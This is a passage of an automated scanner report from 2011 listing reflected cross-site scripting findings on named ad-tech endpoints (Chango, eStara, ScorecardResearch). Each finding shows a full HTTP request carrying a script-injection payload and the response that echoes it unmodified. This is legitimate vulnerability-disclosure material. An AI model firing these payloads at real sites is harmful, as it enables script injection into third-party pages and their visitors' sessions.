tp://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426c4215"><script>alert(1)</script>69873abae82&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455
...[SNIP]...

4.33. http://as.chango.com/links/adunit/1.31759988192e+12 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the sig request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36d27"><script>alert(1)</script>1cc8286ed8d was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad9336d27"><script>alert(1)</script>1cc8286ed8d HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "a5b401f71e5148799a6f2423b07d4cd73d521042"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2364
Date: Sun, 02 Oct 2011 23:59:54 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:54 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:54 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
ose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad9336d27"><script>alert(1)</script>1cc8286ed8d&cu=&dsi=None&clickURL=">
...[SNIP]...

4.34. http://as.chango.com/links/adunit/1.31759988192e+12 [st parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the st request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d371f"><script>alert(1)</script>a5fc9f67176 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broadd371f"><script>alert(1)</script>a5fc9f67176&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "70973571812951c51d2d4496427748c19bd89484"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:59:40 GMT
Content-Length: 2361
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:40 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroadd371f%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ea5fc9f67176; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:40 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broadd371f"><script>alert(1)</script>a5fc9f67176&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad93&cu=&dsi=None&clickUR
...[SNIP]...

4.35. http://as.chango.com/links/adunit/1.31759988192e+12 [stid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the stid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b637"><script>alert(1)</script>76dda13d31e was submitted in the stid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk1b637"><script>alert(1)</script>76dda13d31e&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "f33fc4f1aaa842e9b43349e461b453f890502a86"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2364
Date: Sun, 02 Oct 2011 23:59:43 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:43 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk1b637%22%3E%3Cscript%3Ealert%281%29%3C/script%3E76dda13d31e%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:43 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B5866234.13;sz=300x250;ord=1317599983.43;click1=http://as.chango.com/links/click1317599983.45?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk1b637"><script>alert(1)</script>76dda13d31e&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259
...[SNIP]...

4.36. http://as.chango.com/links/adunit/1.31759988192e+12 [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3c05"><script>alert(1)</script>f38714b81ab was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-livef3c05"><script>alert(1)</script>f38714b81ab&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "d3186fb91500f90491eca40b2def79ca69709121"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2364
Date: Sun, 02 Oct 2011 23:59:50 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:50 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:50 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B586
...[SNIP]...
d=1317599990.48;click1=http://as.chango.com/links/click1317599990.49?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-livef3c05"><script>alert(1)</script>f38714b81ab&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&
...[SNIP]...

4.37. http://as.chango.com/links/adunit/1.31759988192e+12 [wh parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The value of the wh request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afd2d"><script>alert(1)</script>60dd599054f was submitted in the wh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300afd2d"><script>alert(1)</script>60dd599054f&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Content-Length: 588
Server: Chango RTB Server
ETag: "56e6cc8d003260b1dbdb5eff69d7d20a9c15541b"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Date: Sun, 02 Oct 2011 23:59:51 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e08343d11b9c3808f0d628fbdc6f7; Domain=chango.com; expires=Wed, 29 Sep 2021 23:59:51 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:59:51 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml
...[SNIP]...
<body style="width: 300afd2d"><script>alert(1)</script>60dd599054fpx; height: 250px; margin: 0; padding: 0;">
...[SNIP]...

4.38. http://as00.estara.com/as/InitiateCall2.php [template parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as00.estara.com
Path:   /as/InitiateCall2.php

Issue detail

The value of the template request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80641'%3balert(1)//6c9e0c7792f was submitted in the template parameter. This input was echoed as 80641';alert(1)//6c9e0c7792f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /as/InitiateCall2.php?accountid=200106297609&template=85669580641'%3balert(1)//6c9e0c7792f&checklinkstatus=1&var2=912&var6=5860EEFA281121EC93852AEC182A3278&var7=912&var10=http%3A//travela.priceline.com/hotel/searchResults.do%3Fjsk%3D5463010a5064010a2011100300091519d011589950%26key%3Dgtapcnq5%26showDP%3Dy%26NYOPRedirNI%3Dnull HTTP/1.1
Host: as00.estara.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fs_nocache_guid=5860EEFA281121EC93852AEC182A3278; fscookies=b64_XZPLcsMgDEX-xrtm9OSxyLd0nDYz6SJpp3H-vxiDEGFjLke6WJJNAAiBclbSMzKqUk5JlvWyXZ8bOfr.uz4.H3-3c5ATZsgh98VLi0sK2lwYkF9cKjWXdEJSUbAVeUEmfbt9bc9z23--XB-7XiPa.b5v54oJuYNDTOS.bh.3a4Upc7bIKnpkFS4SWEdkFT0SOHgSjEhAsfc4xMhhn8PeTTwRI6yQqJNDDJI9yUb6oGKAvA.gPCGWjs5j3KkNQOUkiGRTzBGXFJFaIV3UC3CJhL2QLgYRT8QT9UQ9IU9okAwqRqropLRo5FRhpLRikF00kkCCuR2ik-JJj0qrGAQ9QSMkOY2CmnIMxndUDsqflNSCD9WDiwrqg0s2Tc7knWN6dY6Tc5yc1TuXForvp1gHEDGMkTZlNmG6IkxXhKmw4AsTjODqqGrkMYjL25VnOrHu.Q8_

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:23 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Length: 10170
Content-Type: application/x-javascript


var wv_available = true;
if (typeof(wv_available_vars) == 'undefined')
wv_available_vars = new Array();
wv_available_vars['85669580641';alert(1)//6c9e0c7792f'] = true;

var wv_vars=typeof(wv_vars)=="undefined"?new Array():wv_vars;wv_vars["ui_width"]="430";wv_vars["ui_height"]="378";wv_vars["ui_version"]="UI0001";wv_vars["ui_newwindow"]="yes";wv_vars["ui_ac
...[SNIP]...

4.39. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 3f294<script>alert(1)</script>398e6a34688 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=83f294<script>alert(1)</script>398e6a34688&c2=6036211&c3=&c4=&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 23:52:48 GMT
Date: Sun, 02 Oct 2011 23:52:48 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"83f294<script>alert(1)</script>398e6a34688", c2:"6036211", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.40. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 724b2<script>alert(1)</script>af07be835b7 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=&c5=&c6=&c10=724b2<script>alert(1)</script>af07be835b7 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 23:52:54 GMT
Date: Sun, 02 Oct 2011 23:52:54 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
e;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"", c5:"", c6:"", c10:"724b2<script>alert(1)</script>af07be835b7", c15:"", c16:"", r:""});



4.41. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 66acc<script>alert(1)</script>97f36e4c3b7 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=603621166acc<script>alert(1)</script>97f36e4c3b7&c3=&c4=&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 23:52:49 GMT
Date: Sun, 02 Oct 2011 23:52:49 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"603621166acc<script>alert(1)</script>97f36e4c3b7", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.42. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 1371e<script>alert(1)</script>3fbe42d830d was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=1371e<script>alert(1)</script>3fbe42d830d&c4=&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 23:52:50 GMT
Date: Sun, 02 Oct 2011 23:52:50 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ry{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"1371e<script>alert(1)</script>3fbe42d830d", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.43. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

